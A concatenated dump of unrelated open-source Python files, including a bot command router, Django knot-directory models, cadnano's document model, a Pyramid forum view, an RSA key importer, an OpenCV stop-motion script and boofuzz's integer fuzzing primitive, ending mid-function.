('/weather', WeatherCommand),
('/curiosity', CuriosityCommand),
('/qr', QrCommand),
('/ocr', OcrCommand),
('/apod', APODCommand),
('/wiki', WikiCommand),
('/random', RandomCommand),
('/xkcd', XkcdCommand),
('/latestnews', LatestNewsCommand),
('/topnews', TopNewsCommand),
('/bestnews', BestNewsCommand),
('/remember', RememberAll),
)
@classmethod
def route(cls, message: Dict[str, Any]):
command, _, query = message['text'].partition(' ')
command = command.lower()
command_class = dict(cls.command_class_mapper).get(command)
if command_class is None:
return
command_instance = command_class(cls, query, message)
return command_instance()
@classmethod
def get_commands_help(cls):
return (
(command, command_class.help_text)
for command, command_class in cls.command_class_mapper
if command_class.help_text is not None
)
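# Usage sketch (message payload is an illustrative Telegram-style update):
#
#   CommandRouter.route({"text": "/weather Toronto"})
#   list(CommandRouter.get_commands_help())  # -> [("/help", "..."), ...]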
althalus/knotcrafters | knotdirectory/knotdirectory/knots/models.py
from django.db import models
from taggit.managers import TaggableManager
from django.core.urlresolvers import reverse
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth import get_user_model
User = get_user_model()
class Knot(models.Model):
name = models.CharField(max_length=90, help_text="Commonly accepted name for this tie")
other_names = models.TextField(help_text="Is this knot known by other names? One name per line, please", blank=True)
creator_name = models.CharField(max_length=90, help_text="Who should we credit for discovering this tie")
creator = models.ForeignKey('CreatorProfile', blank=True, null=True, editable=False)
notes = models.TextField(help_text="Any other information? Markdown text enabled.", blank=True)
tags = TaggableManager()
date_added = models.DateTimeField(auto_now_add=True)
date_updated = models.DateTimeField(auto_now=True)
photo = models.ImageField(upload_to="knotsimages/%Y/%m/", help_text="A photo of the completed tie.")
def save(self):
if not self.creator:
try:
self.creator = CreatorProfile.objects.get(name=self.creator_name)
except CreatorProfile.DoesNotExist:
cp = CreatorProfile()
cp.name = self.creator_name
cp.save()
self.creator = cp
super(Knot, self).save()
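# Sketch of the auto-linking above (names illustrative): saving a Knot with an
# unknown creator_name creates the matching CreatorProfile on demand.
#
#   knot = Knot(name="Trinity", creator_name="Alice"); knot.save()
#   knot.creator  # -> CreatorProfile with name "Alice"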
def get_absolute_url(self):
return reverse("knots.detail", args=[self.pk, ])
def __unicode__(self):
return u'%s' % self.name
class Link(models.Model):
knot = models.ForeignKey(Knot)
link = models.URLField(help_text="Link ot the guide")
name = models.CharField(max_length=90, help_text="A descriptive name for this guide")
def __unicode__(self):
return u'Link %s on knot %s' % (self.name, self.knot.name)
class Action(models.Model):
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = generic.GenericForeignKey('content_type', 'object_id')
user = models.ForeignKey(User)
when = models.DateTimeField(auto_now=True)
what = models.TextField()
def __unicode__(self):
return u'%s: %s %s %s' % (self.when, self.user, self.what, self.content_object)
class CreatorProfile(models.Model):
name = models.CharField(max_length=90)
link_facebook_profile = models.URLField(blank=True)
link_youtube_channel = models.URLField(blank=True)
link_website = models.URLField(blank=True)
email = models.EmailField(blank=True)
user = models.ForeignKey(User, blank=True, null=True)
bio = models.TextField(blank=True, null=True)
def __unicode__(self):
return u'%s' % self.name
def get_absolute_url(self):
return reverse("creators.detail", args=[self.pk, ])
LogikSim/LogikSimPython | src/debug/pyside_bugs/nonimplemented_virtual_methods.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Copyright 2014 The LogikSim Authors. All rights reserved.
Use of this source code is governed by the GNU GPL license that can
be found in the LICENSE.txt file.
Nonimplemented virtual methods can lead to event-handling problems.
Run the script as-is and you will observe the following issues:
- The frame cannot be closed normally; the process must be killed
- Resizing the program leads to strange error messages:
QPainter::begin: Paint device returned engine == 0, type: 0
Proposed changes:
- Detect unresolvable virtual methods and print appropriate error message
Workaround for this example:
Uncomment:
def sizeHint(self, *args):
return self.rect().size()
"""
import sys
from PySide import QtGui
class TestRect(QtGui.QGraphicsRectItem, QtGui.QGraphicsLayoutItem):
def __init__(self, *args, **kargs):
QtGui.QGraphicsRectItem.__init__(self, *args, **kargs)
QtGui.QGraphicsLayoutItem.__init__(self, *args, **kargs)
self.setRect(0, 0, 200, 100)
def setGeometry(self, rect):
self.setRect(rect)
# def sizeHint(self, *args):
# return self.rect().size()
def add_rect_with_layout(scene):
item1 = TestRect()
item2 = TestRect()
scene.addItem(item1)
scene.addItem(item2)
layout = QtGui.QGraphicsGridLayout()
layout.addItem(item1, 0, 0)
layout.addItem(item2, 0, 1)
form = QtGui.QGraphicsWidget()
form.setLayout(layout)
scene.addItem(form)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene()
add_rect_with_layout(scene)
view = QtGui.QGraphicsView()
view.setScene(scene)
view.show()
app.exec_()
JMMolenaar/cadnano2.5 | cadnano/document.py
#!/usr/bin/env python
# encoding: utf-8
from operator import itemgetter
import cadnano.util as util
import cadnano.preferences as prefs
from cadnano.cnproxy import ProxyObject, ProxySignal
from cadnano.cnproxy import UndoStack, UndoCommand
from cadnano.strand import Strand
from cadnano.oligo import Oligo
from cadnano.strandset import StrandSet
from cadnano.virtualhelix import VirtualHelix
from cadnano.part import Part
from cadnano.part import HoneycombPart
from cadnano.part import SquarePart
from cadnano import app
class Document(ProxyObject):
"""
The Document class is the root of the model. It has two main purposes:
1. Serve as the parent all Part objects within the model.
2. Track all sub-model actions on its undoStack.
"""
def __init__(self, parent=None):
super(Document, self).__init__(parent)
self._undostack = UndoStack()
self._parts = []
self._assemblies = []
self._controller = None
self._selected_part = None
# the dictionary maintains what is selected
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
app().documentWasCreatedSignal.emit(self)
# end def
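# Construction sketch (illustrative; assumes a cadnano app context is running):
#
#   doc = Document()
#   part = doc.addHoneycombPart()  # emits documentPartAddedSignal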
### SIGNALS ###
documentPartAddedSignal = ProxySignal(object,
ProxyObject,
name='documentPartAddedSignal') # doc, part
# dict of tuples of objects using the reference as the key,
# and the value is a tuple with meta data
# in the case of strands the metadata would be which endpoints of selected
# e.g. { objectRef: (value0, value1), ...}
documentSelectedChangedSignal = ProxySignal(dict,
name='documentSelectedChangedSignal') # tuples of items + data
documentSelectionFilterChangedSignal = ProxySignal(list,
name='documentSelectionFilterChangedSignal')
documentViewResetSignal = ProxySignal(ProxyObject,
name='documentViewResetSignal')
documentClearSelectionsSignal = ProxySignal(ProxyObject,
name='documentClearSelectionsSignal')
### SLOTS ###
### ACCESSORS ###
def undoStack(self):
"""
This is the actual undoStack to use for all commands. Any children
needing to perform commands should just ask their parent for the
undoStack, and eventually the request will get here.
"""
return self._undostack
def parts(self):
"""Returns a list of parts associated with the document."""
return self._parts
def assemblies(self):
"""Returns a list of assemblies associated with the document."""
return self._assemblies
### PUBLIC METHODS FOR QUERYING THE MODEL ###
def selectedPart(self):
return self._selected_part
def addToSelection(self, obj, value):
self._selection_dict[obj] = value
self._selected_changed_dict[obj] = value
# end def
def removeFromSelection(self, obj):
if obj in self._selection_dict:
del self._selection_dict[obj]
self._selected_changed_dict[obj] = (False, False)
return True
else:
return False
# end def
def clearSelections(self):
"""
Only clear the dictionary
"""
self._selection_dict = {}
# end def
def addStrandToSelection(self, strand, value):
ss = strand.strandSet()
if ss in self._selection_dict:
self._selection_dict[ss][strand] = value
else:
self._selection_dict[ss] = {strand: value}
self._selected_changed_dict[strand] = value
# end def
def removeStrandFromSelection(self, strand):
ss = strand.strandSet()
if ss in self._selection_dict:
temp = self._selection_dict[ss]
if strand in temp:
del temp[strand]
if len(temp) == 0:
del self._selection_dict[ss]
self._selected_changed_dict[strand] = (False, False)
return True
else:
return False
else:
return False
# end def
def selectionDict(self):
return self._selection_dict
# end def
def selectedOligos(self):
"""
If at least one endpoint of a strand is in the selection, then the whole
oligo is considered selected.
"""
s_dict = self._selection_dict
selected_oligos = set()
for ss in s_dict.keys():
for strand in ss:
selected_oligos.add(strand.oligo())
# end for
# end for
return selected_oligos if len(selected_oligos) > 0 else None
#end def
def clearAllSelected(self):
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
self.documentClearSelectionsSignal.emit(self)
# end def
def isModelSelected(self, obj):
return obj in self._selection_dict
# end def
def isModelStrandSelected(self, strand):
ss = strand.strandSet()
if ss in self._selection_dict:
if strand in self._selection_dict[ss]:
return True
else:
return False
else:
return False
# end def
def getSelectedValue(self, obj):
"""
obj is an object to look up;
it is pre-vetted to be in the dictionary
"""
return self._selection_dict[obj]
def getSelectedStrandValue(self, strand):
"""
strand is an object to look up;
it is pre-vetted to be in the dictionary
"""
return self._selection_dict[strand.strandSet()][strand]
# end def
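# Selection bookkeeping sketch: strands are keyed by their StrandSet and map to
# (low_end_selected, high_end_selected) tuples, e.g.:
#
#   doc.addStrandToSelection(strand, (True, False))  # low endpoint only
#   doc.getSelectedStrandValue(strand)               # -> (True, False)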
def sortedSelectedStrands(self, strandset):
# outList = self._selection_dict[strandset].keys()
# outList.sort(key=Strand.lowIdx)
out_list = [x for x in self._selection_dict[strandset].items()]
getLowIdx = lambda x: Strand.lowIdx(itemgetter(0)(x))
out_list.sort(key=getLowIdx)
return out_list
# end def
def determineStrandSetBounds(self, selected_strand_list, strandset):
min_low_delta = strandset.partMaxBaseIdx()
min_high_delta = strandset.partMaxBaseIdx() # init the return values
ss_dict = self._selection_dict[strandset]
# get the StrandSet index of the first item in the list
ss_idx = strandset._findIndexOfRangeFor(selected_strand_list[0][0])[2]
ss_list = strandset._strand_list
len_ss_list = len(ss_list)
max_ss_idx = len_ss_list - 1
i = 0
for strand, value in selected_strand_list:
while strand != ss_list[ss_idx]:
# in case there are gaps due to double xovers
ss_idx += 1
# end while
idxL, idxH = strand.idxs()
if value[0]: # the end is selected
if ss_idx > 0:
low_neighbor = ss_list[ss_idx - 1]
if low_neighbor in ss_dict:
valueN = ss_dict[low_neighbor]
# we only care if the low neighbor is not selected
temp = min_low_delta if valueN[1] \
else idxL - low_neighbor.highIdx() - 1
# end if
else: # not selected
temp = idxL - low_neighbor.highIdx() - 1
# end else
else:
temp = idxL - 0
# end else
if temp < min_low_delta:
min_low_delta = temp
# end if
# check the other end of the strand
if not value[1]:
temp = idxH - idxL - 1
if temp < min_high_delta:
min_high_delta = temp
# end if
if value[1]:
if ss_idx < max_ss_idx:
high_neighbor = ss_list[ss_idx + 1]
if high_neighbor in ss_dict:
valueN = ss_dict[high_neighbor]
# we only care if the low neighbor is not selected
temp = min_high_delta if valueN[0] \
else high_neighbor.lowIdx() - idxH - 1
# end if
else: # not selected
temp = high_neighbor.lowIdx() - idxH - 1
# end else
else:
temp = strandset.partMaxBaseIdx() - idxH
# end else
if temp < min_high_delta:
min_high_delta = temp
# end if
# check the other end of the strand
if not value[0]:
temp = idxH - idxL - 1
if temp < min_low_delta:
min_low_delta = temp
# end if
# increment counter
ss_idx += 1
# end for
return (min_low_delta, min_high_delta)
# end def
def getSelectionBounds(self):
min_low_delta = -1
min_high_delta = -1
for strandset in self._selection_dict.keys():
selected_list = self.sortedSelectedStrands(strandset)
temp_low, temp_high = self.determineStrandSetBounds(
selected_list, strandset)
if temp_low < min_low_delta or min_low_delta < 0:
min_low_delta = temp_low
if temp_high < min_high_delta or min_high_delta < 0:
min_high_delta = temp_high
# end for
return (min_low_delta, min_high_delta)
# end def
# def operateOnStrandSelection(self, method, arg, both=False):
# pass
# # end def
def deleteSelection(self, use_undostack=True):
"""
Delete selected strands. First iterates through all selected strands
and extracts refs to xovers and strands. Next, calls removeXover
on xoverlist as part of its own macroed command for isoluation
purposes. Finally, calls removeStrand on all strands that were
fully selected (low and high), or had at least one non-xover
endpoint selected.
"""
xoList = []
strand_dict = {}
for strandset_dict in self._selection_dict.values():
for strand, selected in strandset_dict.items():
part = strand.virtualHelix().part()
idxL, idxH = strand.idxs()
strand5p = strand.connection5p()
strand3p = strand.connection3p()
# both ends are selected
strand_dict[strand] = selected[0] and selected[1]
# only look at 3' ends to handle xover deletion
sel3p = selected[0] if idxL == strand.idx3Prime() else selected[1]
if sel3p: # is idx3p selected?
if strand3p: # is there an xover
xoList.append((part, strand, strand3p, use_undostack))
else: # idx3p is a selected endpoint
strand_dict[strand] = True
else:
if not strand5p: # idx5p is a selected endpoint
strand_dict[strand] = True
if use_undostack and xoList:
self.undoStack().beginMacro("Delete xovers")
for part, strand, strand3p, useUndo in xoList:
Part.removeXover(part, strand, strand3p, useUndo)
self.removeStrandFromSelection(strand)
self.removeStrandFromSelection(strand3p)
self._selection_dict = {}
self.documentClearSelectionsSignal.emit(self)
if use_undostack:
if xoList: # end xover macro if it was started
self.undoStack().endMacro()
if True in strand_dict.values():
self.undoStack().beginMacro("Delete selection")
else:
return # nothing left to do
for strand, delete in strand_dict.items():
if delete:
strand.strandSet().removeStrand(strand)
if use_undostack:
self.undoStack().endMacro()
def paintSelection(self, scafColor, stapColor, use_undostack=True):
"""Delete xovers if present. Otherwise delete everything."""
scaf_oligos = {}
stap_oligos = {}
for strandset_dict in self._selection_dict.values():
for strand, value in strandset_dict.items():
if strand.isScaffold():
scaf_oligos[strand.oligo()] = True
else:
stap_oligos[strand.oligo()] = True
if use_undostack:
self.undoStack().beginMacro("Paint strands")
for olg in scaf_oligos.keys():
olg.applyColor(scafColor)
for olg in stap_oligos.keys():
olg.applyColor(stapColor)
if use_undostack:
self.undoStack().endMacro()
def resizeSelection(self, delta, use_undostack=True):
"""
Moves the selected idxs by delta by first iterating over all strands
to calculate new idxs (method will return if snap-to behavior would
create illegal state), then applying a resize command to each strand.
"""
resize_list = []
# calculate new idxs
for strandset_dict in self._selection_dict.values():
for strand, selected in strandset_dict.items():
part = strand.virtualHelix().part()
idxL, idxH = strand.idxs()
newL, newH = strand.idxs()
deltaL = deltaH = delta
# process xovers to get revised delta
if selected[0] and strand.connectionLow():
newL = part.xoverSnapTo(strand, idxL, delta)
if newL is None:
return
deltaH = newL-idxL
if selected[1] and strand.connectionHigh():
newH = part.xoverSnapTo(strand, idxH, delta)
if newH is None:
return
deltaL = newH-idxH
# process endpoints
if selected[0] and not strand.connectionLow():
newL = idxL + deltaL
if selected[1] and not strand.connectionHigh():
newH = idxH + deltaH
if newL > newH: # check for illegal state
return
resize_list.append((strand, newL, newH))
# end for
# end for
# execute the resize commands
if use_undostack:
self.undoStack().beginMacro("Resize Selection")
for strand, idxL, idxH in resize_list:
Strand.resize(strand, (idxL, idxH), use_undostack)
if use_undostack:
self.undoStack().endMacro()
# end def
def updateSelection(self):
"""
do it this way in the future when we have
a better signaling architecture between views
"""
# self.documentSelectedChangedSignal.emit(self._selected_changed_dict)
"""
For now, individual objects need to emit signals
"""
for obj, value in self._selected_changed_dict.items():
obj.selectedChangedSignal.emit(obj, value)
# end for
self._selected_changed_dict = {}
# for ss in self._selection_dict:
# print self.sortedSelectedStrands(ss)
# end def
def resetViews(self):
# This is a fast way to clear selections and the views.
# We could manually deselect each item from the Dict, but we'll just
# let them be garbage collect
# the dictionary maintains what is selected
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
self.documentViewResetSignal.emit(self)
# end def
### PUBLIC METHODS FOR EDITING THE MODEL ###
def addHoneycombPart(self, max_row=prefs.HONEYCOMB_PART_MAXROWS,
max_col=prefs.HONEYCOMB_PART_MAXCOLS,
max_steps=prefs.HONEYCOMB_PART_MAXSTEPS):
"""
Create and store a new DNAPart and instance, and return the instance.
"""
dnapart = None
if len(self._parts) == 0:
dnapart = HoneycombPart(document=self, max_row=max_row,
max_col=max_col, max_steps=max_steps)
self._addPart(dnapart)
return dnapart
def addSquarePart(self, max_row=prefs.SQUARE_PART_MAXROWS,
max_col=prefs.SQUARE_PART_MAXCOLS,
max_steps=prefs.SQUARE_PART_MAXSTEPS):
"""
Create and store a new DNAPart and instance, and return the instance.
"""
dnapart = None
if len(self._parts) == 0:
dnapart = SquarePart(document=self, max_row=max_row,
max_col=max_col, max_steps=max_steps)
self._addPart(dnapart)
return dnapart
def removeAllParts(self):
"""Used to reset the document. Not undoable."""
self.documentClearSelectionsSignal.emit(self)
for part in self._parts:
part.remove(use_undostack=False)
# end def
def removePart(self, part):
self.documentClearSelectionsSignal.emit(self)
self._parts.remove(part)
### PUBLIC SUPPORT METHODS ###
def controller(self):
return self._controller
def setController(self, controller):
"""Called by DocumentController setDocument method."""
self._controller = controller
# end def
def setSelectedPart(self, newPart):
if self._selected_part == newPart:
return
self._selected_part = newPart
# end def
### PRIVATE SUPPORT METHODS ###
def _addPart(self, part, use_undostack=True):
"""Add part to the document via AddPartCommand."""
c = self.AddPartCommand(self, part)
util.execCommandList(
self, [c], desc="Add part", use_undostack=use_undostack)
return c.part()
# end def
### COMMANDS ###
class AddPartCommand(UndoCommand):
"""
Undo ready command for deleting a part.
"""
def __init__(self, document, part):
super(Document.AddPartCommand, self).__init__("add part")
self._doc = document
self._part = part
# end def
def part(self):
return self._part
# end def
def redo(self):
if len(self._doc._parts) == 0:
self._doc._parts.append(self._part)
self._part.setDocument(self._doc)
self._doc.setSelectedPart(self._part)
self._doc.documentPartAddedSignal.emit(self._doc, self._part)
# end def
def undo(self):
self._doc.removePart(self._part)
self._part.setDocument(None)
self._doc.setSelectedPart(None)
self._part.partRemovedSignal.emit(self._part)
# self._doc.documentPartAddedSignal.emit(self._doc, self._part)
# end def
# end class
# end class
CrystallineEntity/bulbs | bulbs/views/home.py
from pyramid.view import view_config
from bulbs.components.subcategory import number_of_threads, number_of_posts, last_post
from bulbs.components import db
def catinfo(cat):
keys = "id", "title", "desc", "slug"
keys_values = zip(keys, cat)
return dict(keys_values)
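# Sketch (row values illustrative): catinfo pairs the fixed keys with a DB row.
#
#   catinfo((3, "General", "Misc talk", "general"))
#   # -> {"id": 3, "title": "General", "desc": "Misc talk", "slug": "general"}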
def categories():
"""Return a dict containing all categories."""
cursor = db.con.cursor()
cursor.execute("SELECT id, title, description, slug FROM bulbs_category")
cats = cursor.fetchall()
data = map(catinfo, cats)
return data
def subcatinfo(data):
keys = "id", "title", "category_id", "desc", "slug"
keys_values = zip(keys, data)
id = data[0]
return dict(keys_values,
id=id,
threads=number_of_threads(id),
posts=number_of_posts(id),
last_post=last_post(id)
)
def subcategories(cat_id=None):
"""Return a dict containing information from a specified category or forums for every category."""
cursor = db.con.cursor()
if cat_id is not None:
cursor.execute(
"SELECT id, title, category_id, description, slug FROM bulbs_subcategory \
WHERE category_id = %s", (cat_id, ))
else:
cursor.execute(
"SELECT id, title, category_id, description, slug FROM bulbs_subcategory")
children = cursor.fetchall()
subcategories_ = map(subcatinfo, children)
return subcategories_
@view_config(route_name="home", renderer="home.mako")
def response(request):
cursor = db.con.cursor()
cats = categories()
subcats = list(subcategories())
cursor.execute("SELECT username FROM bulbs_user ORDER BY date DESC LIMIT 1")
newest_user = cursor.fetchone()[0]
return {
"project": request.registry.settings.get("site_name"),
"title": "Home",
"categories": cats,
"subcategories": subcats,
"new_member": newest_user
}
repotvsupertuga/tvsupertuga.repository | script.module.cryptolib/lib/Crypto/PublicKey/RSA.py
#!/usr/bin/env python
from __future__ import absolute_import
import binascii
import struct
from rsa import PublicKey, PrivateKey
from Crypto.Math.Numbers import Integer
def import_key(extern_key, passphrase=None):
"""Import an RSA key (public or private half), encoded in standard
form.
:Parameter extern_key:
The RSA key to import, encoded as a byte string.
An RSA public key can be in any of the following formats:
- X.509 certificate (binary or PEM format)
- X.509 ``subjectPublicKeyInfo`` DER SEQUENCE (binary or PEM
encoding)
- `PKCS#1`_ ``RSAPublicKey`` DER SEQUENCE (binary or PEM encoding)
- OpenSSH (textual public key only)
An RSA private key can be in any of the following formats:
- PKCS#1 ``RSAPrivateKey`` DER SEQUENCE (binary or PEM encoding)
- `PKCS#8`_ ``PrivateKeyInfo`` or ``EncryptedPrivateKeyInfo``
DER SEQUENCE (binary or PEM encoding)
- OpenSSH (textual public key only)
For details about the PEM encoding, see `RFC1421`_/`RFC1423`_.
The private key may be encrypted by means of a certain pass phrase
either at the PEM level or at the PKCS#8 level.
:Type extern_key: string
:Parameter passphrase:
In case of an encrypted private key, this is the pass phrase from
which the decryption key is derived.
:Type passphrase: string
:Return: An RSA key object (`RsaKey`).
:Raise ValueError/IndexError/TypeError:
When the given key cannot be parsed (possibly because the pass
phrase is wrong).
.. _RFC1421: http://www.ietf.org/rfc/rfc1421.txt
.. _RFC1423: http://www.ietf.org/rfc/rfc1423.txt
.. _`PKCS#1`: http://www.ietf.org/rfc/rfc3447.txt
.. _`PKCS#8`: http://www.ietf.org/rfc/rfc5208.txt
"""
if passphrase is not None:
raise ValueError("RSA key passphrase is not supported")
if extern_key.startswith('ssh-rsa '):
# This is probably an OpenSSH key
keystring = binascii.a2b_base64(extern_key.split(' ')[1])
keyparts = []
while len(keystring) > 4:
l = struct.unpack(">I", keystring[:4])[0]
keyparts.append(keystring[4:4 + l])
keystring = keystring[4 + l:]
e = Integer.from_bytes(keyparts[1])
n = Integer.from_bytes(keyparts[2])
return PublicKey(n._value, e._value)
for fmt in ("PEM", "DER"):
try:
return PrivateKey.load_pkcs1(extern_key, fmt)
except:
try:
return PublicKey.load_pkcs1(extern_key, fmt)
except:
pass
raise ValueError("RSA key format is not supported")
# Backward compatibility
importKey = import_key
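# Usage sketch (file names are placeholders, not real keys):
#
#   pub = import_key(open("id_rsa.pub").read())   # OpenSSH "ssh-rsa ..." line
#   prv = import_key(open("key.pem").read())      # PKCS#1 PEM, public or private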
fatcloud/PyCV-time | experiments/stop_motion_tool/stop_motion_tool.py
from cam import OpenCV_Cam
import cv2
import os.path
import time
cam = OpenCV_Cam(0)
cam.size = (1920, 1080)
KEY_ESC = 27
KEY_SPACE = ord(' ')
PAGE_DOWN = 2228224 # This makes the stop motion controllable from a presenter remote.
prevFrame = None
i = 0
# Make a directory in the current working directory with the date and time as its name
timestr = time.strftime("%Y%m%d-%H%M%S")
cwd = os.getcwd()
dirName = cwd + "\\"+timestr
os.makedirs(dirName)
fname= cwd + "\\frame_.png"
if os.path.isfile(fname):
prevFrame = cv2.imread(fname)
# Make an .avi file from the collected frames
fourcc = cv2.cv.CV_FOURCC(*'XVID')
video = cv2.VideoWriter(dirName+"\\"+'output_.avi',fourcc, 3.0, cam.size, isColor =True)
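# Note: XVID at 3.0 fps is an arbitrary stop-motion cadence; frames passed to
# video.write() should match cam.size or OpenCV may discard them.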
while True:
# Capture frame-by-frame
frame = cam.read()
# image processing functions
# Show the frame in a window named 'Press ESC to exit'
if (prevFrame is not None):
showFrame = cv2.addWeighted(frame,0.7,prevFrame,0.3,0)
else:
showFrame = frame
resizeShowFrame = cv2.resize(showFrame, (0,0), fx = 0.5, fy = 0.5 )
cv2.imshow('Press ESC to exit', resizeShowFrame)
# wait for the key
key_code = cv2.waitKey(10)
if key_code == KEY_SPACE or key_code == PAGE_DOWN:
cv2.imwrite(dirName+"\\"+'frame'+str(i)+'_.png', frame)
video.write(frame)
prevFrame = frame
i += 1
elif key_code == KEY_ESC:
cv2.imwrite(cwd + '\\frame_.png', prevFrame)
break
cv2.destroyAllWindows()
cam.release()
video.release()
googleapis/googleapis-gen | google/cloud/translate/v3beta1/translation-v3beta1-py/google/cloud/translate_v3beta1/types/__init__.py
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .translation_service import (
BatchDocumentInputConfig,
BatchDocumentOutputConfig,
BatchTranslateDocumentMetadata,
BatchTranslateDocumentRequest,
BatchTranslateDocumentResponse,
BatchTranslateMetadata,
BatchTranslateResponse,
BatchTranslateTextRequest,
CreateGlossaryMetadata,
CreateGlossaryRequest,
DeleteGlossaryMetadata,
DeleteGlossaryRequest,
DeleteGlossaryResponse,
DetectedLanguage,
DetectLanguageRequest,
DetectLanguageResponse,
DocumentInputConfig,
DocumentOutputConfig,
DocumentTranslation,
GcsDestination,
GcsSource,
GetGlossaryRequest,
GetSupportedLanguagesRequest,
Glossary,
GlossaryInputConfig,
InputConfig,
ListGlossariesRequest,
ListGlossariesResponse,
OutputConfig,
SupportedLanguage,
SupportedLanguages,
TranslateDocumentRequest,
TranslateDocumentResponse,
TranslateTextGlossaryConfig,
TranslateTextRequest,
TranslateTextResponse,
Translation,
)
__all__ = (
'BatchDocumentInputConfig',
'BatchDocumentOutputConfig',
'BatchTranslateDocumentMetadata',
'BatchTranslateDocumentRequest',
'BatchTranslateDocumentResponse',
'BatchTranslateMetadata',
'BatchTranslateResponse',
'BatchTranslateTextRequest',
'CreateGlossaryMetadata',
'CreateGlossaryRequest',
'DeleteGlossaryMetadata',
'DeleteGlossaryRequest',
'DeleteGlossaryResponse',
'DetectedLanguage',
'DetectLanguageRequest',
'DetectLanguageResponse',
'DocumentInputConfig',
'DocumentOutputConfig',
'DocumentTranslation',
'GcsDestination',
'GcsSource',
'GetGlossaryRequest',
'GetSupportedLanguagesRequest',
'Glossary',
'GlossaryInputConfig',
'InputConfig',
'ListGlossariesRequest',
'ListGlossariesResponse',
'OutputConfig',
'SupportedLanguage',
'SupportedLanguages',
'TranslateDocumentRequest',
'TranslateDocumentResponse',
'TranslateTextGlossaryConfig',
'TranslateTextRequest',
'TranslateTextResponse',
'Translation',
)
jtpereyda/boofuzz | boofuzz/primitives/bit_field.py
import struct
from builtins import range
import six
from past.builtins import map
from .. import helpers
from ..constants import LITTLE_ENDIAN
from ..fuzzable import Fuzzable
def binary_string_to_int(binary):
"""
Convert a binary string to a decimal number.
@type binary: str
@param binary: Binary string
@rtype: int
@return: Converted bit string
"""
return int(binary, 2)
def int_to_binary_string(number, bit_width):
"""
Convert a number to a binary string.
@type number: int
@param number: (Optional, def=self._value) Number to convert
@type bit_width: int
@param bit_width: (Optional, def=self.width) Width of bit string
@rtype: str
@return: Bit string
"""
return "".join(map(lambda x: str((number >> x) & 1), range(bit_width - 1, -1, -1)))
class BitField(Fuzzable):
"""
The bit field primitive represents a number of variable length and is used to define all other integer types.
:type name: str, optional
:param name: Name, for referencing later. Names should always be provided, but if not, a default name will be given,
defaults to None
:type default_value: int, optional
:param default_value: Default integer value, defaults to 0
:type width: int, optional
:param width: Width in bits, defaults to 8
:type max_num: int, optional
:param max_num: Maximum number to iterate up to, defaults to None
:type endian: char, optional
:param endian: Endianness of the bit field (LITTLE_ENDIAN: <, BIG_ENDIAN: >), defaults to LITTLE_ENDIAN
:type output_format: str, optional
:param output_format: Output format, "binary" or "ascii", defaults to binary
:type signed: bool, optional
:param signed: Make size signed vs. unsigned (applicable only with format="ascii"), defaults to False
:type full_range: bool, optional
:param full_range: If enabled the field mutates through *all* possible values, defaults to False
:type fuzz_values: list, optional
:param fuzz_values: List of custom fuzz values to add to the normal mutations, defaults to None
:type fuzzable: bool, optional
:param fuzzable: Enable/disable fuzzing of this primitive, defaults to true
"""
def __init__(
self,
name=None,
default_value=0,
width=8,
max_num=None,
endian=LITTLE_ENDIAN,
output_format="binary",
signed=False,
full_range=False,
*args,
**kwargs
):
super(BitField, self).__init__(name=name, default_value=default_value, *args, **kwargs)
assert isinstance(width, six.integer_types), "width must be an integer!"
self.width = width
self.max_num = max_num
self.endian = endian
self.format = output_format
self.signed = signed
self.full_range = full_range
if not self.max_num:
self.max_num = binary_string_to_int("1" + "0" * width)
assert isinstance(self.max_num, six.integer_types), "max_num must be an integer!"
def _iterate_fuzz_lib(self):
if self.full_range:
for i in range(0, self.max_num):
yield i
else:
# try only "smart" values.
interesting_boundaries = [
0,
self.max_num // 2,
self.max_num // 3,
self.max_num // 4,
self.max_num // 8,
self.max_num // 16,
self.max_num // 32,
self.max_num,
]
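            # Each boundary is expanded to its +/-10 neighborhood by
            # _yield_integer_boundaries below, covering off-by-one edges.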
for boundary in interesting_boundaries:
for v in self._yield_integer_boundaries(boundary):
yield v
# TODO Add a way to inject a list of fuzz values
# elif isinstance(default_value, (list, tuple)):
# for val in iter(default_value):
# yield val
# TODO: Add injectable arbitrary bit fields
def _yield_integer_boundaries(self, integer):
"""
Add the supplied integer and border cases to the integer fuzz heuristics library.
@type integer: int
@param integer: int to append to fuzz heuristics
"""
for i in range(-10, 10):
case = integer + i
if 0 <= case < self.max_num:
# some day: if case not in self._user_provided_values
yield case
def encode(self, value, mutation_context):
temp = self._render_int(
value, output_format=self.format, bit_width=self.width, endian=self.endian, signed=self.signed
)
return helpers.str_to_bytes(temp)
def mutations(self, default_value):
for val in self._iterate_fuzz_lib():
yield val
@staticmethod
def _render_int(value, output_format, bit_width, endian, signed):
"""
Convert value to a bit or byte string.
Args:
value (int): Value to convert to a byte string.
output_format (str): "binary" or "ascii"
bit_width (int): Width of output in bits.
endian: BIG_ENDIAN or LITTLE_ENDIAN
signed (bool):
Returns:
str: value converted to a byte string
"""
if output_format == "binary":
bit_stream = ""
rendered = b""
# pad the bit stream to the next byte boundary.
if bit_width % 8 == 0:
bit_stream += int_to_binary_string(value, bit_width)
else:
bit_stream = "0" * (8 - (bit_width % 8))
bit_stream += int_to_binary_string(value, bit_width)
# convert the bit stream from a string of bits into raw bytes.
for i in range(len(bit_stream) // 8):
chunk_min = 8 * i
chunk_max = chunk_min + 8
chunk = bit_stream[chunk_min:chunk_max]
rendered += struct.pack("B", binary_string_to_int(chunk))
# if necessary, convert the endianness of the raw bytes.
if endian == LITTLE_ENDIAN:
# reverse the bytes
rendered = rendered[::-1]
_rendered = rendered
else:
# Otherwise we have ascii/something else
# if the sign flag is raised and we are dealing with a signed integer (first bit is 1).
if signed and int_to_binary_string(value, bit_width)[0] == "1":
